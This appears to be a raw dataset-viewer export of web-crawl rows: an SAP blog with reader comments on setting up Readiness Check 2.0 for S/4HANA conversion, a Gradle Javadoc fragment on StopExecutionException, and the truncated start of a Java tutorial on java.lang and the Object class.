text stringlengths 20 1.01M | url stringlengths 14 1.25k | dump stringlengths 9 15 ⌀ | lang stringclasses 4
values | source stringclasses 4
values |
|---|---|---|---|---|
Updated 5 Oct 2019. Also valid for conversion to S/4HANA 1909
This blog is for the detailed steps for Readiness Check (RC) 2.0 for step t2 of conversion to S/4HANA 1809FPS0, FPS1 and FPS2. Readiness Check is an optional step and is a high level analysis to get a Results Dashboard and also download to a Results Document with details of Active Business Functions, Add-On Compatibility, Custom Code Analysis, Recommended Fiori Apps, S/4HANA Sizing, Simplification Items, Business Process Analytics and Data Volume Management.
Download the Readiness Check User Guide for reference
Please find other blogs as follows:
Please find the process flow diagram with application of notes as below.
All steps are according to Note 2758146 – SAP Readiness Check 2.0 & Next Generation SAP Business Scenario Recommendations version 34. Click on Show Changes for revisions.
STEP 1: PREPARATION
De-implement any of the notes if they were implemented earlier. In case of ABAP class inconsistency, please clean up the class header in transaction SE24, specify the object and select Utilities => Regenerate sections in the change mode.
If you face issues with above, please open OSS message. If you try to download latest version of note and apply, it may cause a bigger issue with a lot of time wasted later on.
You should have 6-8 weeks of transaction history (tcode ST03) in the production system or the system in which you want to execute the application analysis. Otherwise, SAP Readiness Check for SAP S/4HANA can return inaccurate or incomplete results.
If you have SAP Note 2310438 implemented in your system, de-implement note 2310438 first.
STEP 2: SET UP CUSTOM CODE ANALYSIS
Apply Note 2185390 – Custom Code Analyzer (includes manual steps)
This note will download other dependent notes, and then some other dependent notes and this goes on. Number may vary depending on your patch level. The Note requires Manual steps as below:
As per Manual steps above, In SE80 create Package SYCM_MAIN
Create SubPackage SYCM_ANALYSIS
Confirm Manual step. Then the note application will prompt for another manual step depending on your SP level, its only applicable to the narrow range of SAP_BASIS SP08 to SP11 only.
In SE11, create table WBINDEX You will require the developer key and object access key.
Add field PROGNAME and confirm manual step.
In SA38, run SAPRSEUC in background now or after the optional step to run it in parallel to improve performance. This is a long running job and runs single threaded by default.
TIP: Please note it is not required to run the job SAPRSEUB, which updated Where-Used list for the whole system, the SAPRSEUC updates Where-Used list for Customization only. Job SAPRSEUB used to run several days like 11 days at one customer. The good thing is if it is cancelled it continues from the point it was cancelled with a overhead or 20-30 mins for every restart.
If you have issues in running this job the component for OSS message is BC-DWB-CEX.
STEP 3: (OPTIONAL) IMPROVE PERFORMANCE OF JOB SAPRSEUC
Apply note Note 2667023 – Runtime of job EU_INIT or SAPRSEUB/SAPRSEUC, performance Manual steps are in Note 2228460 – Runtime of job EU_INIT, SAPRSEUB, performance
You will have to register developer if needed, and register object to get Access key and fill in as below:
Add 2 fields as below:
In SE38, BSP_INIT_INDEX_CROS, Variant , Change, add text elements as below. there are 7 programs and 1 class with text elements to be updated.
You may also be prompted for Programs WDY_INIT_INDEX_CROSS, SAPRSEUI, QSC_INDEX_ALL_PROXIES to add text elements.
After applying the note, job runs with one background process and uses number of dialog processes as defined in (1) table RSEUPACTRL as below. (2) Add column ALLSERVER, if it is blank, (3) Mark X for parallel processing and (4) define percentage of dialog processes to be used according to timezone. If this is sandbox that you want to finish the job as soon as possible you could jackup these percentages.
You can now schedule the job SAPRSEUC if you decided to do the optional steps.
STEP 4: ENABLING S/4HANA SIZING DATA COLLECTION
Apply Note 1872170 – ABAP on HANA sizing report (S/4HANA, Suite on HANA…) – cannot be implemented in SNOTE. Please read the note.
Using tCode SNOTE apply Note 2734952 – HANA memory Sizing report – Advanced correction 12 So far this is the latest, if there is later note please apply that note instead of 2734952.
Please note:
- Note requires minimum ST-PI 740/SP02 or 700,710/SP12 to apply the note.
- If you don’t want to apply ST-PI, instead of applying this note, implement report ZNEWHDB_SIZE as described in Note 1872170 – ABAP on HANA sizing report Please note that if you take this option, there are 3 programs and function module to be created/updated to latest code.
TIP: ST-PI is independent and doesn’t need other components or stack.xml to apply, this would save lot of manual work. IMPORTANT: In the Note 2758146 it is mentioned that to include sizing in analysis report dashboard, it is recommended to have ST-PI 740/SP07, 700,710/SP17
In tcode SE38, check that program /SDF/HDB_SIZING is available and you can even run it for test now.
Please use below for troubleshooting if you run into issues. The same program runs later on when scheduling analysis and the job RC_COLLECT_ANALYSIS_DATA is run as per STEP 12.
This is related to 2 jobs we launch in step 13 – TMW_RC_HANAS_DATA_COLL & /SDF/HDB_SIZING_SM. If you have issues in running this job the component for OSS message is XX-SER-SAPSMP-ST.
STEP 5: ENABLING SIMPLIFICATION ITEM CHECK
Apply Note 2399707 – Simplification Item Check. This can be applied quickly. There are no Manual corrections.
This note helps run 1 job we launch in step 13 – TMW_RC_SITEM_DATA_COLL. If you have issues in running this job the component for OSS message is CA-TRS-PRCK
STEP 6: ENABLING BUSINESS PROCESS ANALYTICS ANALYSIS
Apply Note 2745851 – Business Process Improvement Content for SAP Readiness Check 2.0 and Next Generation SAP Business Scenario Recommendations Content. This note should be applied quickly in the productive client. There are no Manual corrections
This note is related to 1 job we launch in step 13 – TMW_RC_BPA_DATA_COLL. If you have issues in running this job the component for OSS message is SV-SMG-MON-BPM-ANA.
STEP 7: ENABLING IDOC ANALYSIS
Apply Note 2769657 – Interface Discovery for IDoc as part of Readiness Check
You need minimum ST-A/PI 01S_700/01S_731. Apply using SAINT. If you have issues in running this job the component for OSS message is SV-SMG-MON-BPM-DCM.
STEP 8: ENABLING DATA VOLUME MANAGEMENT ANALYSIS
The note can be implemented for ST-PI 740 SP01 700/710 SP09
Apply Note 2612179 using SNOTE.
As per manual instructions folow this sequence,
- SNOTE apply Note 2611746 – DVM Create objects for APIs for triggering and monitoring ST14 analyses
- tCode SE38 run program NOTE_2611746
- SNOTE will apply Note Note 2612179 – DVM API to trigger and monitor DVM ST14 analyses for Readiness Check
- In SNOTE apply Note 2693666 – Enhance error handling when collecting DVM ST14 data for SAP S/4 HANA Readiness Check
TIP: If there are any errors in DVM data collection, refer Note 1159758 -Data Volume Management: Central Preparation Note and also Note 2721530 – “FAQ for collecting DVM data during S/4 HANA Readiness Check.
This note is related to 4 jobs we launch in step 13 – TMW_RC_DVM_DATA_COLL, BP_APPLICATION_ANALYSIS_01, DANA_ANALYSIS, TAANA_ANALYSIS. If you have issues in running this job the component for OSS message is SV-SMG-DVM.
STEP 9: SETTING UP READINESS CHECK
Apply Note 2758146 – SAP Readiness Check 2.0 & Next Generation SAP Business Scenario Recommendations
This prompts for applying Note 2185390 – Custom Code Analyzer and you already did it in earlier step, so confirm. We have already applied this note.
The job related to Readiness Check master report we launch in step 13 is RC_COLLECT_ANALYSIS_DATA. If you have issues in running this job the component for OSS message is SV-SCS-S4R.
STEP 10: RUN BACKGROUND JOB IN DEV SYSTEM TO DOWNLOAD METADATA INFO
In SE38 run background job SYCM_DOWNLOAD_REPOSITORY_INFO. Define the variant to restrict to the required namespace.
Then run the program in background using this variant.
If the where-used list index for customer objects is not up to date you will get error below:
Please refer Note: 2655768 – Custom Code Analyzer – The where-used list index for customer objects is not up to date
STEP 11: MONITOR BACKGROUND JOB AND DOWNLOAD ZIP FILE
In case you get below dump:
After the job is finished, in SE38 run SYCM_DOWNLOAD_REPOSITORY_INFO again and click on button to Download Zip file…
The solution is – Enter tCode SE38, Program LZEHPRC_CP_BB20UXX, click on Change (You will need developer access). Go to menu option Utilities, Settings.
select option above, click on OK, Save and Activate the program. Unfortunately you have to Rerun the job from the beginning.
STEP 12: TRANSPORT 7+ NOTES TO PRODUCTION
In tCode SE01, release transport and using tCode STMS import into QAS and PROD systems in the landscape.
STEP 13: RUN BACKGROUND JOB IN PROD SYSTEM
In the productive client, tCode SE38 – RC_COLLECT_ANALYSIS_DATA (1) select target S/4HANA Version, (2) Schedule Analysis, (3) Immediate and (4) ok. As per the note 2758146, if you do not have the min ST-PI 700/710 SP17 or 740 SP07, then unmark the checkbox for HANA Sizing Data.
This will trigger number of background jobs as shown in next step.
You should get message that Job RC_COLLECT_ANALYSIS_DATA is scheduled, and a series of messages.
TIP: If there are any errors in DVM data collection, refer Note 1159758 -Data Volume Management: Central Preparation Note and also Note 2721530 – “FAQ for collecting DVM data during S/4 HANA Readiness Check.
If you get this error, apply Note 2443236 – SAP Readiness Check for SAP S/4HANA Business Process Improvement Content and also the needed ST-A/PI through SPAM.
STEP 14: MONITOR BACKGROUND JOB AND DOWNLOAD ZIP FILE
There are various jobs launched in order as below and you must check job logs to ensure the data was collected properly.
Job RC_COLLECT_ANALYSIS_DATA is the main job to collect analysis data.
Job TMW_RC_BPA_DATA_COLL is scheduled to collect Business Process Analytics data
Job TMW_RC_HANAS_DATA_COLL is scheduled to collect HANA Sizing data
Job TMW_RC_DVM_DATA_COLL is scheduled to collect Data Volume Management data
Job /SDF/HDB_SIZING_SM is scheduled to collect data for sizing
Job TMW_RC_SITEM_DATA_COLL is scheduled to collect Simplification Item relevance check data
Job BO APPLICATION ANALYSIS NN scheduled for DVM triggers TAANA and DANA Analysis
Job TAANA ANALYSIS is scheduled for large Table Analysis
Job DANA ANALYSIS is scheduled for Data Volume Management Analysis
After the jobs are finished, in SE38 run RC_COLLECT_ANALYSIS_DATA again and click on button to Download Analysis Data as shown in previous step.
ERROR SITUATION 1: If the job TMW_RC_HANAS_DATA_COLL gives error – internal Error! Set GF_INCLNO in 00F_SET_INCLNO, refer SAP Note 2809344 – Job TMW_RC_BPA_DATA_COLL is cancelled with error: “internal Error! Set GF_INCLNO in 00F_SET_INCLNO” which suggests to apply Note 2557474.
STEP 15: GENERATE READINESS CHECK RESULTS DASHBOARD
In SAP Launchpad (S-USER is required) url (1)
(2) Start New Analysis, (3) Analysis Name, (4) Customer, (5) Browse, (6) Select zip file RC2AnalysisDataSIDyyyymmdd.zip, (7) & (8) Terms of use, (9) Create.
Once the analysis is in ready state (about an hour), Open the analysis and use the zip file generated from program SYCM_DOWNLOAD_REPOSITORY_INFO and click (1) icon on the top right, (2) Browse, (3) select filename S4HMigrationRepositoryInfoSID.zip, (4) Terms of Use,(5) Update .
You can click on wheel (1) and switch on (3) for Update & Delete to input details of (3) email id click on Save (4). You can click on + to add more email id’s.
You can view the Results Dashboard as shown below.
Above steps complete the readiness check.
Readiness Check should be used as a interactive dashboard which has the greatest benefit of online team collaboration. It is now possible to download the Readiness Check as a word document like in Readiness Check 1.0. Customer can provide access to any Implementation Partner with P-User which can be easily created or SAP employee. The access can also be revoked as needed.
ERROR SITUATION 1: In case you get the message below, it is likely that your system is not connected properly through Solution Manager to the SAP Support Portal. Please refer Note 2408911 and blog.
Use component for Readiness Check: SV-SCS-S4R to report problems during preparation or execution.
STEP 16: (OPTIONAL) ENABLE ATC CHECK RESULT EXPORT
Please follow the elaborate process to apply notes in Checked System as per blog – Conversion to S/4HANA 1809FPS0 – t5 – Custom Code Migration
Apply the required 4+ notes in checked system, Apply 3+ notes in Central Checking system which should be Netweaver 7.52 or higher.
In the Central Checking system run tCode ATC, Runs, Manage Results. In the ATC Results Browser select (1) the result series, Right Click and select (2) Export File for, (3) SAP Readiness Check for S/4HANA”. You will doenload a file named <SID>_atc_findings.zip
You can get the results in the Custom Code Analysis tile as shown below:
If you have issues in running this job the component for OSS message is BC-DWB-CEX.
STEP 17: (OPTIONAL) ENABLE CONSISTENCY CHECK RESULT EXPORT
Apply Note 2502552 – S4TC – SAP S/4HANA Conversion & Upgrade new Simplification Item Checks
There is an elaborate process to apply this note. Please refer the steps 1-5 in the Simplification Item Check blog – Conversion to S/4HANA 1809FPS0 – t4 – Simplification Item-Check
You can run the program RC_COLLECT_ANALYSIS_DATA selecting all items or below.
Download the zip file and simply click on Update Analysis icon to upload the zip archive update the analysis. Dashboard will retain old data for other items and update the Simplification Item consistency check. If you have issues in running this job the component for OSS message is CA-TRS-PRCK.
You can also do this for example if only sizing data is required to be updated => apply the latest sizing note and run the program RC_COLLECT_ANALYSIS_DATA with checkmark on Hana sizing and then click on Update Analysis to upload the zip archive.
LANDSCAPE CONSIDERATIONS:
There is no option available to create the Readiness Check 2.0 through Solution Manager.
As shown in the main graphic, you could run analysis related to Custom Code on DEV system so you analyze code that has never gone into production. If you want to analyze only code that has gone into production please run analysis related to Custom Code in PROD.
Another reason for running Custom Code Analysis job in DEV system is where used index may take a while in PROD system.
TIP: During your regular maintenance patch update, please include ST-PI & ST-A/PI, that way some of the required notes are already applied. Both these OCS Packages ST-PI and ST-A/PI do not need stack the xml and can be applied separately.
OTHER REFERENCES:
Readiness Check Help Portal
Readiness Chck User Guide
Note 2758146 – SAP Readiness Check 2.0 & Next Generation SAP Business Scenario Recommendations
Readiness Check Jam Group
Readiness Check video
Expert Guided Implementation (EGI) <===== sessions on SAP Learning Hub, SAP Enterprise Support Edition*
*Only SAP Enterprise Support customers are eligible to attend this remote training workshop. Please note that to access the SAP Learning Hub, edition for SAP Enterprise Support, a one-time registration is required. A detailed step-by step guidance can be found here.
FAQ blog – SAP Readiness Check 2.0 for SAP S/4HANA – FAQ & What’s New in Releases
Thank you. Hope you enjoyed the blog !
Mahesh Sardesai
Product Expert – S/4HANA
Hello Mahesh,
Great effort on highlighting all steps for Readiness Check 2.0.
But I would like to highlight few things here. The last screenshot of dashboard, is really from new application of SAP Readiness check 2.0? Because I got different visualization in dashboard.
I think for SAP Readiness Check 2.0 we have to use URL, not as mentioned in your steps.
Also we first need to upload only RC_COLLECT_ANALYSIS_DATA file while creating analysis report (there is no provision to upload both report at the same time) and once it is in ready state we upload SYNC_DOWNLOAD_REPOSITORY_INFO by clicking on the left hand icon of “update analysis”. It will update the report.
I feel steps mentioned here are bit misinforming as it highlights some part of SAP Readiness Check 1.0 as well.
Regards,
Dennis
Hi Dennis,
I click on publish too soon when it wasn’t ready. It has been updated now. Thanks.
Hi Mahesh,
I came to step 16 without any problem and while uploading my RC2AnalysisDataRRR20190530.zip, I received this warning: “Analysis creation failed: The uploaded file is not valid. Check that the file is downloaded using report RC_COLLECT_ANALYSIS_DATA.”
I don´t know what to do or where to find the reason.
Can you help me please?
Best regards
Slavomír Hronec
Hi,
There has been revision to the Note 2758146 (version 18) on 29 May.
Please download version 18 and run the analysis again.
Hi Mahesh,
I executed a readiness check 2.0 and I got some problems:
thank you in advance
Simone
Hi Simone,
have you get any reply for the topic “why don´t get any informations in section business process discovery”?
We have the same problem but I can´t get any information how to solve that issue.
Thanks & Regards,
Manuel
Sorry Manuel,
but my issue is not solved.
If I’ll discover the cause, I’ll share with you.
Regards
Simone
Hi Simone,
Please note that this particular note is to be applied in productive client and if you have applied it in client 000 it may not pull data. Also please note the main graphic the programRC_COLLECT_ANALYSIS_DATA has to be run in productive client not 000 or other client.
Thanks,
Thank you Mahesh for your reply.
About first point, I charged the productive statistics on TST system and I got the infos.
About the second, ok: I’ll analyze the summary from the ZNEWHDB_SIZE log.
On referring to point 3, I applyed the suggested sapnote into the used client, and executed the RC* tool on correct client, but the business process analysis is unavailable from both readiness check, because the bpa.xml is quite empty.
Simone
HI Mahesh
is it possible to run the readiness check in a CCS (SAP Utilities) version 6.03?
SAP ECC is installed in another instance and will be kept as is.
In CCS there are thousands of developments and readiness would help in the evaluation
another question: my customer is live in S/4HANA 1511. Can I run readiness check?
thanks a lot in advance
Bruno
Hi,
Readiness Check is primarily for Conversion of ERP to S/4HANA. It looks like you would like to analyse custom code and it would be good to do the check for Custom Code Migration Worklist and this will require Netweaver 7.52 system.
You can do the readiness check for upgrade to get summary report but being already on S/4HANA the benefit here is reduced. You could prepare the simplification list itself by applying note 2502552 as you already have TCI note in the system, it may be little effort to get to the final iist.
Dear Mahesh thank you very much
all the best Bruno
Hi all,
do you – really?! – call this a decent “Readyness check”? I’d assume, that nothing is ready, i.e. prepared from the vendor. “Run simple” by delegating the work, trial and error to the customer.
What a foreseeable mess…
Hi Joerg,
Sorry that the tool did not meet your expectations. It has been tested well with our testing team and partners. Please let us know issues you are facing so we can consider for improvement.
Hi @ all,
does anyone have an idea why section business process discovery don´t deliver any information?
In every section of the readiness check 2.0 I receive information except for this section of business process discovery.
Would be great to get an answer how to solve this issue.
Thanks & Regards,
Manuel
Great Blog 🙂 Thank you.
Is there any Blog how to implement the RC 2.0 on BW systems?
Kind regards,
Karsten
Hi Karsten,
Karsten Kautz RC 2.0 is not available for BW systems.
Best regards
Renaud
HI ,
when you click on the Create Result Document , we will get the below error .
HTTP Status 504 – An internal application error occurred. Request: 1234567 supportportal:supportshell
Regards
Prabhu
Hi Allamprabhu,
“Create Result Document” is only valid for Readiness Check 1.0 and is available for Readiness Check 2.0. Also the old readiness check is being discontinued, so you will have to create OSS message to check if it is available.
Hi,
We’re pursuing the below approach for S/4 HANA conversion. Having said that, does readiness check 2.0 and simplification item checks are required to run or applicable to this scenario as well?
“Selective data transition using Landscape transformation”
Regards,
Dheeraj
Hi Dheeraj,
Readiness Check is applicable to conversion scenario. However if you have ECC system you can still run it to get information on S/4HANA to know what add-ons are installed, what business functions you have activated, what simplification items are applicable specific to your scenario. Some of these may be redundant.
However you have to ignore certain information that may no longer be worth using like for example sizing.
Thanks for this great blog !
Result Document will be available mid-September on RC 2.0
For custom full code analysis you will need to have a 7.52 system to be able to use ABAP Test Cockpit
Best regards
HI Mahesh,
thank you for answering my question .
TMW_RC_BPA_DATA_COLL : job getting failed due to the memory issue , i have increased the memory by report : RSMEMORY , even that also the issue is not solved .
internal table PROGRAM=/SSA/EKP/FORM=09F_COLLECT_DATA=LT_PURCH2_DATA IL_03
could not be further extended
the amount of storage space in byews filled at termination time was
Role are 11958080
Ext memory (EM) 4001312480
ASS Memory (HEP) 3999415488
Page area 32768
Maximum address space 429467295
TSV_TNEW_PAGE_ALLOC_FAILED
/SSA/EKP or /SSA/EKP
09F_COLLECT_DATA
Hi Allamprabhu,
The error could be related to Business Process Analytics check – BPA data coll as you mentioned. Some customers have reported issue and there has been a correction on this recently. Please download latest version of changed notes and try again.. | https://blogs.sap.com/2019/05/23/conversion-to-s4hana-1809fps0-t2-readiness-check-2.0/ | CC-MAIN-2019-43 | en | refinedweb |
Serializable
public class StopExecutionException extends RuntimeException
A
StopExecutionException is thrown by a
Action or task action closure to
stop execution of the current task and start execution of the next task. This allows, for example, precondition
actions to be added to a task which abort execution of the task if the preconditions are not met.
Note that throwing this exception does not fail the execution of the task or the | https://docs.gradle.org/current/javadoc/org/gradle/api/tasks/StopExecutionException.html | CC-MAIN-2019-43 | en | refinedweb |
We are about to switch to a new forum software. Until then we have removed the registration on this forum.
Hi there dear enthusiasts,
I have been trying to run a couple of processing (java based) sketches using Jython. However, in both cases I am getting similar errors which I can not resolve. Here is my first piece of very basic code:
from processing.core import PApplet class HelloProcessing(PApplet): def setup(self): global p p = self p.size(350, 350) def draw(self): p.fill(p.random(255)) p.rect(150, 150, 50, 50) if __name__ == '__main__': import pawt pawt.test(HelloProcessing()) `
I get the following errors:
Traceback (most recent call last): File "/home/nimanamjouyan/workspace/LearningPyDev/src/helloProcessing.py", line 15, in <module> pawt.test(HelloProcessing()) File "/home/nimanamjouyan/jython-installer-2.7.0/Lib/pawt/__init__.py", line 9, in test f.add('Center', panel) TypeError: add(): 1st arg can't be coerced to String, java.awt.Component
The other piece of code I am trying to run is this:) return self.PApplet
The error I am getting this time is:
Traceback (most recent call last): File "/home/nimanamjouyan/workspace/LearningPyDev/src/RandBoxesTest.py", line 54, in <module> frame.add(panel) TypeError: add(): 1st arg can't be coerced to java.awt.PopupMenu, java.awt.Component
These two errors seem to be very similar. What am I doing wrong here? is java.awt incompatible with the class that I am parsing to? How can I fix this?
Any help is much appreciated.
Answers
Hi there,
I actually found a solution which makes the program work, but it does not address the problem. The "core.jar" file which I was using was from Processing 3.2.3. I changed it with the "core.jar" from Processing 1.5.1 and 2.2.1 and for both of them I no longer got the error and the program worked.
this
is trying to add a PApplet to a frame. if PApplet isn't one of Component or Popup menu then you'll have trouble. and PApplet changed sometime in P3, away from extending Applet
processing-3.1.1/core/library/core.jar
public class PApplet implements PConstants
processing-3.0b7/core/library/core.jar
public class PApplet implements PConstants
processing-2.2.1/core/library/core.jar
public class PApplet extends Applet implements PConstants, Runnable, MouseListener, MouseWheelListener, MouseMotionListener, KeyListener, FocusListener {...
I've repeated that zillion times already: :-<
Latest version which still
extendsJava's Applet class is 3.0a5! :(|)
Though I would still recommend using version 2.2.1
Thanks guys!!!! Also I was wondering why my mouse functions like "mousePressed" are not working. I changed the first code a little bit to make the colour of the rectangle dependent on the press of the mouse:
But it does not seem to work. any ideas why not?
I have no idea what that
pawtis for.
But AFAIK, class PApplet needs its methods main() or runSketch() in order to "ignite" it! :-?
The mouse does not work in my other longer code which is not using
pawt. Would you please point me to an example or let me know how I can use "mousePressed' and other Processing mouse functions? Also I have not used main() or runSketch(), but Processing functions such as fill() and rect() seem to work, but mouse stuff does not work. Any ideas why?
Sorry, I barely know anything about Python or its "ecosystem". X_X
That's just my Java Mode knowledge.
What its pre-processor does to transpile a ".pde" to an actual ".java" file. ~O)
I am not really sure about the pre-processor either. I really want to make this code work on eclipse so then I can integrate it with other python code and run it on a server as a GUI ( I am referring to the longer piece of code). Nonetheless, if you find anything or any guides relevant to my case, I would really appreciate it, if you could let me know. I really want to get the mouse working
In order to use Processing code on Eclipse or other IDE's, it's important to know how PDE's pre-processor works. That's all I know. 8-|
I see. I actually switched "mousePressed" with "mouseButton" and specified the button and it works! For some reason "mousePressed" is not working. Moreover, when I use
print(mousePressed)I get something weird like
<bound method Sketch.mousePressed of org.python.proxies.__main__$Sketch$0[panel0,0,0,300x300,layout=java.awt.FlowLayout]>
But when I do the same with "mouseButton" I actually get an integer value. It seems that some functions are not working? I am not exactly sure what is going on.
In Java, fields, methods & classes, each got its own namespace.
It means we can use the same label name for each of those 3 categories at the same time!
However, we don't have separate namespaces for JS. And I believe that's true for Python as well. :-@
Hi ! I have the same problem, did you fix it ? I need help too ! | https://forum.processing.org/two/discussion/19617/why-do-i-keep-getting-similar-errors-while-trying-to-run-processing-using-jython-in-eclipse | CC-MAIN-2019-43 | en | refinedweb |
We are about to switch to a new forum software. Until then we have removed the registration on this forum.
Hello everybody, I want that while there is a live webcam it is possible to adjust the brightness and contrast of color and gray images. This is my code:
import processing.video.*; import g4p_controls.*; import java.awt.Font; import gab.opencv.*; OpenCV opencv; PFont f; boolean filterT=false; Capture cam; GButton btnFilterT; int n = 1; void setup() { size(1024, 768); f = createFont("Arial", 48, true); btnFilterT = new GButton(this, 740, 50, 140, 20); btnFilterT.setText("On"); btnFilterT.setLocalColorScheme(GCScheme.GREEN_SCHEME); cam = new Capture(this, 640, 480); cam.start(); } void draw() { if (cam.available() == true) { cam.read(); } pushMatrix(); scale(-1, 1); image(cam.get(), -width, 0, width, height); popMatrix(); opencv = new OpenCV(this, cam); opencv.loadImage(cam); if (filterT==true) { opencv.brightness((int)map(mouseX, 0, width, -255, 255)); image(opencv.getOutput(),0, 0, width, height); } } public void handleButtonEvents(GButton button, GEvent event) { if (button == btnFilterT) { filterT=true; } }
I have two problems:
if I press the T button to start the brightness and contrast in gray, the screen flips over and becomes no mirror.
how can I have brightness and contrast with the mirror video?
how can I have the brightness and contrast of the webcam color?
thank you
Answers
To answer the first question: I think the reason why the the screen flips over is that you only perform push, scale and pop on cam.get() but not on openvc.getOutput().
Thanks Andreas_Ref, I have tried to change:
image(opencv.getOutput(), -width, 0, width, height);
but it does not work. Anyone have any ideas to suggest?
thanks
I was hoping somebody in the community would have answered this question by now. I tried myself but I failed.
Next I am assuming opencv.getOutput() returns a PImage object.
The code next is a dirty test suggestion, partial code and un-tested. Also explore previous post using scale:
I am interested to know if this will work.
Kf
Thank you very much for your help kfrajer!
Your example works fine!
But then when I slightly changed it started to does not work Opencv.brightness ();
Where am I wrong?
thanks
That is very odd. from your previous code, i notice that inversion is observed only on the image that you draw in line 113 and it is shown only for a split second. I removed G4P and openCV thinking they were changing the object and my luck didn't change. Odd enough, the previous example did work so it seems....
I kinda gave up because I couldn't get it to work using scale at the end. It is like image ignore the scale parameter despite been called before. Very very odd.
I have a solution. Sketch below. Notice I assume the sketch and image have the same size.
Kf
Strange. I'm actually trying to understand -- should the previous issue be reported as a bug? Interesting solution, @kfrajer.
I re-tested all the code above and none works. I am not sure if it is a bug or if not being used properly. i think using the default imageMode leads to confusion. I came up with the following example. I create a copy of the current cam image and I display it twice, one inside the push/pop bloc and the second one outside in an untouched reference frame. Notice that I am using imageMode(CENTER). I conclude the one inside the block works.
Kf
This post also works for this case, related to horizontal flipping (Tested in Java but not using G4P... it should work nevertheless):
Kf | https://forum.processing.org/two/discussion/22012/brightness-and-contrast-of-the-webcam | CC-MAIN-2019-43 | en | refinedweb |
import "go.chromium.org/luci/common/iotools"
Package iotools contains a collection of I/O-related utility structs and methods.
bufferingreaderat.go byteslicereader.go chainreader.go countingWriter.go countingreader.go doc.go panicwriter.go responsewriter.go
ErrPanicWriter is panic'd from the Writer provided to the callback in WriteTracker in the event of an io error.
NewBufferingReaderAt returns an io.ReaderAt that reads data in blocks of configurable size and keeps LRU of recently read blocks.
It is great for cases when data is read sequentially from an io.ReaderAt, (e.g. when extracting files using zip.Reader), since by setting large block size we can effectively do lookahead reads.
For example, zip.Reader reads data in 4096 byte chunks by default. By setting block size to 512Kb and LRU size to 1 we reduce the number of read operations significantly (128x), in exchange for the modest amount of RAM.
The reader is safe to user concurrently (just like any ReaderAt), but beware that the LRU is shared and all reads from the underlying reader happen under the lock, so multiple goroutines may end up slowing down each other.
WriteTracker helps to write complex writer routines correctly.
This wraps a Writer with an implementation where any Write method will panic with the ErrPanicWriter error, catch that panic, and return the original io error as well as the number of written bytes.
This means that the callback can use its Writer without tracking the number of bytes written, nor any io errors (i.e. it can ignore the return values from write operations entirely).
If no io errors are encountered, this will return the callback's error and the number of written bytes.
ByteSliceReader is an io.Reader and io.ByteReader implementation that reads and mutates an underlying byte slice.
func (r *ByteSliceReader) Read(buf []byte) (int, error)
Read implements io.Reader.
func (r *ByteSliceReader) ReadByte() (byte, error)
ReadByte implements io.ByteReader.
ChainReader is an io.Reader that consumes data sequentially from independent arrays of data to appear as if they were one single concatenated data source.
The underlying io.Reader will be mutated during operation.
func (cr *ChainReader) Read(p []byte) (int, error)
Read implements io.Reader.
func (cr ChainReader) ReadByte() (byte, error)
ReadByte implements io.ByteReader.
func (cr ChainReader) Remaining() int64
Remaining calculates the amount of data left in the ChainReader. It will panic if an error condition in RemainingErr is encountered.
func (cr ChainReader) RemainingErr() (int64, error)
RemainingErr returns the amount of data left in the ChainReader. An error is returned if any reader in the chain is not either nil or a bytes.Reader.
Note that this method iterates over all readers in the chain each time that it's called.
CountingReader is an io.Reader that counts the number of bytes that are read.
func (c *CountingReader) Read(buf []byte) (int, error)
Read implements io.Reader.
func (c *CountingReader) ReadByte() (byte, error)
ReadByte implements io.ByteReader.
type CountingWriter struct { io.Writer // The underlying io.Writer. // Count is the number of bytes that have been written. Count int64 // contains filtered or unexported fields }
CountingWriter is an io.Writer that counts the number of bytes that are written.
func (c *CountingWriter) Write(buf []byte) (int, error)
Write implements io.Writer.
func (c *CountingWriter) WriteByte(b byte) error
WriteByte implements io.ByteWriter.
ResponseWriter wraps a given http.ResponseWriter, records its status code and response size.
Assumes all writes are externally synchronized.
func NewResponseWriter(rw http.ResponseWriter) *ResponseWriter
NewResponseWriter constructs a ResponseWriter that wraps given 'rw' and tracks how much data was written to it and what status code was set.
func (rw *ResponseWriter) Flush()
Flush sends any buffered data to the client.
func (rw *ResponseWriter) Header() http.Header
Header returns the header map that will be sent by WriteHeader.
func (rw *ResponseWriter) ResponseSize() int64
ResponseSize is size of the response body written so far.
func (rw *ResponseWriter) Status() int
Status is the HTTP status code set in the response.
func (rw *ResponseWriter) Write(buf []byte) (int, error)
Write writes the data to the connection as part of an HTTP reply.
func (rw *ResponseWriter) WriteHeader(code int)
WriteHeader sends an HTTP response header with the provided status code.
Package iotools imports 6 packages (graph) and is imported by 19 packages. Updated 2019-10-14. Refresh now. Tools for package owners. | https://godoc.org/go.chromium.org/luci/common/iotools | CC-MAIN-2019-43 | en | refinedweb |
Exploring the java.lang Library
The java.lang library contains classes and interfaces that are fundamental to every Java program. This package is imported implicitly by the compiler into all programs, so we do not use the import statement to explicitly include it. Due to its tacit nature of inclusion, the significance of its impact often goes unnoticed. The most important class of this library is Object. Every class design in Java is actually a subclass of this class, either directly or indirectly. In other words, Object is the parent of all the classes in Java. Apart from this primordial class, the package contains numerous other classes and interfaces. The article takes on just two of them, the Object class and the collection of wrapper classes of this package, to get a glimpse of the key aspects of this library.
The Object Class
A Java programmer uses inheritance to create classes from existing classes. The primary motivation behind inheritance is to extend the quality of its parent class. That means, if a class has, say, two methods:
class A{ method1(); method2(); }
and another class, B, extends class A, and has a single method:
class B extends A{ // class A methods are inherited automatically method3(); }
class B extends the quality of class A by inheriting the methods defined in class A, in addition to the methods defined within itself.
This is what happens with the Object class. The Object class methods are implicitly inherited by all Java classes. But, the difference is that we do not explicitly use the extend keyword; instead, it is implied by default. In this case, the responsibility of applying the inheritance hierarchy to Java classes rests with the compiler. However, there is no harm in doing so explicitly, although it is utterly unnecessary.
public class Employee extends Object{ // ... }
In relation to this, note that the Employee class never inherits the constructor of the Object class as per the object-oriented principle of superclass-subclass relationship. The Object constructor is implicitly called by the Employee constructor as soon as its objects are created. It is the first task of any subclass constructor to call its immediate parent class constructor, either explicitly or implicitly, to ensure that the instance variables inherited from the superclass are initialized properly before using them.
public Employee(){ // ...implicit call to superclass constructor } public Employee(){ // ...explicit call to superclass constructor super(); }
The Object class provides a number of methods that are universally applicable to all its subclasses. The most common of this is the toString() method. This method returns the string representation of an object. It is particularly useful for debugging purposes. It is recommended that every class overrides this method to get a customized string representation of the object. By default, the toString() method returns the package name with class name, concatenated by an '@' and the hash code of the class instance. As a result, the following two operation invariably have the same string representation:
employeeObject.toString(); employeeObject.getClass().getName()+"@"+ Integer.toHexString(emp.hashCode());
